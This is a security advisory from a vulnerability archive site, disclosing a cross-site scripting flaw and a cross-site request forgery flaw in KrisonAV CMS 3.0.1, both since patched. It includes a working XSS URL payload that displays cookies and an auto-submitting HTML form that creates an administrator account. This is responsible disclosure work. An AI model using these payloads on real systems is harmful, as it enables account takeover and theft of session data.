exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

KrisonAV CMS 3.0.1 CSRF / Cross Site Scripting

KrisonAV CMS 3.0.1 CSRF / Cross Site Scripting
Posted Apr 17, 2013
Authored by High-Tech Bridge SA | Site htbridge.ch

KrisonAV CMS version 3.0.1 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
advisories | CVE-2013-2712, CVE-2013-2713
SHA-256 | 67fef60fe75255a54bdaa421e598033b564c3cd7f9a2ddc60ad14b24dcb74af4

KrisonAV CMS 3.0.1 CSRF / Cross Site Scripting

Change Mirror Download
Advisory ID: HTB23150
Product: KrisonAV CMS
Vendor: http://www.krisonav.com
Vulnerable Version(s): 3.0.1 and probably prior
Tested Version: 3.0.1
Vendor Notification: March 27, 2013
Vendor Patch: March 31, 2013
Public Disclosure: April 17, 2013
Vulnerability Type: Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2013-2712, CVE-2013-2713
Risk Level: Medium
CVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in KrisonAV CMS, which can be exploited to perform cross-site scripting and cross-site request forgery attacks.


1) Cross-Site Scripting (XSS) vulnerability in KrisonAV CMS: CVE-2013-2712

The vulnerability exists due to insufficient filtration of user-supplied data passed to "content" HTTP GET parameter via "/services/get_article.php" script. A remote attacker can trick a logged-in user to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of the vulnerable website.

The exploitation example below uses JavaScript "alert()" function to display user's cookies:

http://[host]/services/get_article.php?content=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E


2) Сross-Site Request Forgery (CSRF) vulnerability in KrisonAV CMS: CVE-2013-2713

The vulnerability exists due to insufficient verification of the HTTP request origin in "/users_maint.html" script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a new account with administrative privileges.

PoC (Proof-of-Concept) below will create a new account with login "username" and password "password":


<form action="http://[host]/users_maint.html?itemid=52&maint=1&ccsForm=users" method="post" name="f1">
<input type="hidden" name="disabledCheckBox" value="1">
<input type="hidden" name="username" value="username">
<input type="hidden" name="password" value="password">
<input type="hidden" name="groups_index" value="20">
<input type="hidden" name="email" value="newuser@mail.com">
<input type="hidden" name="Button_Insert" value="Save">
<input type="submit" id="btn">
</form>
<script>
document.f1.submit();
</script>


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to KrisonAV CMS 3.0.2

More Information:
http://www.krisonav.com/articles_show.html?articles_id=release-notes

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23150 - https://www.htbridge.com/advisory/HTB23150 - Multiple Vulnerabilities in KrisonAV CMS.
[2] KrisonAV CMS - http://www.krisonav.com - KrisonAV is a content management system (CMS), which enables you to build Web sites and online applications. It is based on Codecharge Studio, that makes it extremely powerful and secure.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close